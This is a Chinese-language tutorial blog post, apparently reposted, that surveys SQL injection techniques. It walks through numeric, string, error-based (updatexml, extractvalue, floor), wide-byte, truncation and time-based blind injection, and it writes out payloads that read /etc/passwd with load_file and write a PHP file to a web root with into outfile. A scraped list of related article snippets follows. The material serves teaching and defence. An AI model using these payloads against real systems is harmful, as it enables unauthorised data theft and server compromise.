浅谈SQL注入

先看一个sql语句:

select * from admin where username=‘(此处为用户输入的数据)‘;

在没有任何过滤的情况下,如果用户输入:‘ or 1=1 --

这条语句就为:select * from admin where username=‘‘ or 1=1 --‘;

可见,语句执行永远为真。此时就进行了sql注入。

SQL注入有如下分类:

一、数字型注入

初始参数为:id=1

可以构造:id=1 or 1=1 (语句执行永远为真)

id=1 and 1=2 (语句执行永远为假)

id=1‘ (语句执行会出错)

数字型注入较为简单,而且一般在PHP,ASP等弱类型语言中存在,而对于Java,C#等强类型语言一般不存在。

二、字符型注入

字符型注入首先想到的是闭合单引号。

不难想到:id=1‘ and 1=2 --

-- 是注释后边的语句。

三、其他注入

sql注入其实可以说就是字符型注入和数字型注入。

还有一些常见的注入,如:

POST注入:注入字段在POST数据中。

Cookie注入:注入字段在Cookie字段中。

延时注入:使用数据库延时特性注入。

base64注入:注入字符串需要经过base64加密。

四、Mysql特性

mysql是一种数据库。

(1)三种注释:

#:注释从“#”字符到行尾。

--:注释“-- ”序列到行尾。注意:“-- ”后面要加一个空格。

/**/:注释/*  XXXX */中间的字符。

/**/注释存在一个特点:select id /*!55555,username*/ from users

语句正常执行。/*!55555,username*/的意思是若Mysql版本号高于或者等于5.55.55,语句将会被执行。如果“!”后面不加入版本号,将直接执行sql语句。

(2)mysql函数利用

load_file()函数读文件

读取文件,文件必须在服务器上,文件必须为绝对路径,必须有权限,文件容量小于         max_allowed_packet字节(默认为16MB,最大为1GB),如:

union select 1,load_file(‘/etc/passwd‘),3,4,5,6 #

绕过单引号:union select 1,load_file(字符串转换为十六进制),3,4,5,6 #

union select 1,load_file(char(XX,XX,XX........)),3,4,5,6 #   ascii码

into outfile写文件操作

必须持有权限,文件名为绝对路径。

如:select ‘<?php phpinfo(); ?>‘ into file ‘c:\wwwroot\1.php‘

绕过单引号:select char(XX,XX,XX.......) into file ‘c:\wwwroot\1.php‘

concat 连接字符串

concat(user(),0x2c,database())

concat_ws(0x2c,user(),database())       0x2c是 逗号的16进制。

五、Mysql报错注入

(1)updatexml

select * from admin where id=1 and updatexml(1,(concat(0x7c,(select @@version))),1);

结果返回一个错误:‘|5.1.50-community-log‘

(2)extractvalue

select * from admin where id=1 and extractvalue(1,concat(0x7c,(select user())));

结果返回一个错误:‘|[email protected]‘

(3)floor

select * from admin where id = 1 union select * from (select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b

结果返回:Duplicate entry ‘[email protected]‘ for key ‘group_key‘

六、宽字节注入

如果PHP开启了魔术引号,就会将单引号,双引号,反斜杠和NULL字符加上反斜杠转义。

如:id=‘   会输出    \‘

这时我们可以使用宽字节注入:id=%d5‘     输出:誠‘   注入成功。

我们将  誠 进行url编码:%d5%5c

而 \的url编码为:%5c   可见 ,繁体字将反斜杠吃掉了。这就是宽字节注入的原理。

七、长字符截断

原理很简单。

比如在数据库创建三个如下用户:

admin   (有三个空格)

admin     (有五个空格)

admin       (有七个空格)

三个用户名长度不一样,但是如果 查询admin用户名,三个用户名都会被查询到。

假设后台语句是:

select count(*) from users where username=‘admin‘ and password=‘******‘;

这是存在安全问题的,如果用户创建一个“admin          ”用户,即可轻易进入后台,著名的wordpress就被这样的方式攻击过。

八、延时注入

基于时间差异的盲注手段。延时注入需要用到sleep()函数。

如:select * from users where id = 1 and sleep(3)    #三秒后执行sql语句。

也可以判断是否存在注入:url+id=1 and sleep(3)  页面三秒左右打开,则存在注入。

通常 会采用和 if 函数 搭配使用,进行爆破字符串。

如: and if(hex(mid(user(),L,1)))=N,sleep(3),1)

L的位置代表字符串的第几个字符,N代表ASCII码。

执行成功,则三秒左右返回页面,否则,和原来相同。

ps:坚持,努力,为梦想奋斗。

原文地址:https://www.cnblogs.com/whitehawk/p/9880176.html

时间: 2024-10-30 16:55:51

浅谈SQL注入的相关文章

浅谈SQL注入风险 - 一个Login拿下Server

前两天,带着学生们学习了简单的ASP.NET MVC,通过ADO.NET方式连接数据库,实现增删改查. 可能有一部分学生提前预习过,在我写登录SQL的时候,他们鄙视我说:“老师你这SQL有注入,随便都能登录了.不能这么写!” “呦?小伙子这都知道了?那你说说看 啥是注入?注入只能拿来绕过登录么?” 好吧,竟然在老子面前装逼,看来不给你点儿颜色看看,你还真是不明白天有多高.. 于是乎..哈哈.大清早的,轻松在班里装了一手好逼.. 呵呵.不说了,下面我把那个项目重写一下发上来吧.演示一下注入有哪些危

浅谈SQL注入风险 - 一个Login拿下Server(转)

前两天,带着学生们学习了简单的ASP.NET MVC,通过ADO.NET方式连接数据库,实现增删改查. 可能有一部分学生提前预习过,在我写登录SQL的时候,他们鄙视我说:“老师你这SQL有注入,随便都能登录了.不能这么写!” “呦?小伙子这都知道了?那你说说看 啥是注入?注入只能拿来绕过登录么?” 好吧,竟然在老子面前装逼,看来不给你点儿颜色看看,你还真是不明白天有多高.. 于是乎..哈哈.大清早的,轻松在班里装了一手好逼.. 呵呵.不说了,下面我把那个项目重写一下发上来吧.演示一下注入有哪些危

【sql注入】浅谈sql注入中的Post注入

[sql注入]浅谈sql注入中的Post注入 本文来源:i春秋学院 00x01在许多交流群中,我看见很多朋友对于post注入很是迷茫,曾几何,我也是这样,因为我们都被复杂化了,想的太辅助了所以导致现在感觉到难,现在,就让我们一起来谈谈,post注入是多么的轻松吧!PS:文中有写os-shell00x02测试站点:http://xxx.xxxxx.com/对于我来说,post注入无非有两种方法第一种利用burp抓包然后使用sqlmap -r 来进行检测注入第二种比较简单,直接使用sqlmap --

浅入浅出SQL注入

已经开始了学习牛腩新闻发布系统,在讲后台代码的时候讲了一些重构SQLHelper的知识,存储过程和触发器等,这些以前都是接触过的.而SQL注入是以前没有注意过的,所以停下来总结学习一下SQL注入. 首先什么是SQL注入呢? 实战篇~~~~~~~~~~ SQL注入概念 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到

浅谈SQL Server数据库分页

数据库分页是老生常谈的问题了.如果使用ORM框架,再使用LINQ的话,一个Skip和Take就可以搞定.但是有时由于限制,需要使用存储过程来实现.在SQLServer中使用存储过程实现分页的已经有很多方法了.之前在面试中遇到过这一问题,问如何高效实现数据库分页.刚好上周在业务中也遇到了这个需求,所以在这里简单记录和分享一下. 一 需求 这里以SQLServer的示例数据库NorthWind为例,里面有一张Product表,现在假设我们的需求是要以UnitPrice降序排列,并且分页,每一页10条

转【】浅谈sql中的in与not in,exists与not exists的区别_

浅谈sql中的in与not in,exists与not exists的区别 1.in和exists in是把外表和内表作hash连接,而exists是对外表作loop循环,每次loop循环再对内表进行查询,一直以来认为exists比in效率高的说法是不准确的.如果查询的两个表大小相当,那么用in和exists差别不大:如果两个表中一个较小一个较大,则子查询表大的用exists,子查询表小的用in: 例如:表A(小表),表B(大表) select * from A where cc in(sele

浅谈SQL Server中的事务日志(四)----在完整恢复模式下日志的角色

浅谈SQL Server中的事务日志(四)----在完整恢复模式下日志的角色 本篇文章是系列文章中的第四篇,也是最后一篇,本篇文章需要前三篇的文章知识作为基础,前三篇的文章地址如下: 浅谈SQL Server中的事务日志(一)----事务日志的物理和逻辑构架 浅谈SQL Server中的事务日志(二)----事务日志在修改数据时的角色 浅谈SQL Server中的事务日志(三)----在简单恢复模式下日志的角色 简介 生产环境下的数据是如果可以写在资产负债表上的话,我想这个资产所占的数额一定不会

浅谈SQL Server中的事务日志(二)----事务日志在修改数据时的角色

浅谈SQL Server中的事务日志(二)----事务日志在修改数据时的角色 本篇文章是系列文章中的第二篇,以防你还没有看过第一篇.上一篇的文章地址如下: 浅谈SQL Server中的事务日志(一)----事务日志的物理和逻辑构架 简介 每一个SQL Server的数据库都会按照其修改数据(insert,update,delete)的顺序将对应的日志记录到日志文件.SQL Server使用了Write-Ahead logging技术来保证了事务日志的原子性和持久性.而这项技术不仅仅保证了ACID

浅谈SQL Server中的事务日志(一)----事务日志的物理和逻辑构架

浅谈SQL Server中的事务日志(一)----事务日志的物理和逻辑构架 简介 SQL Server中的事务日志无疑是SQL Server中最重要的部分之一.因为SQL SERVER利用事务日志来确保持久性(Durability)和事务回滚(Rollback).从而还部分确保了事务的ACID属性.在SQL Server崩溃时,DBA还可以通过事务日志将数据恢复到指定的时间点.当SQL Server运转良好时,多了解一些事务日志的原理和概念显得并不是那么重要.但是,一旦SQL SERVER发生崩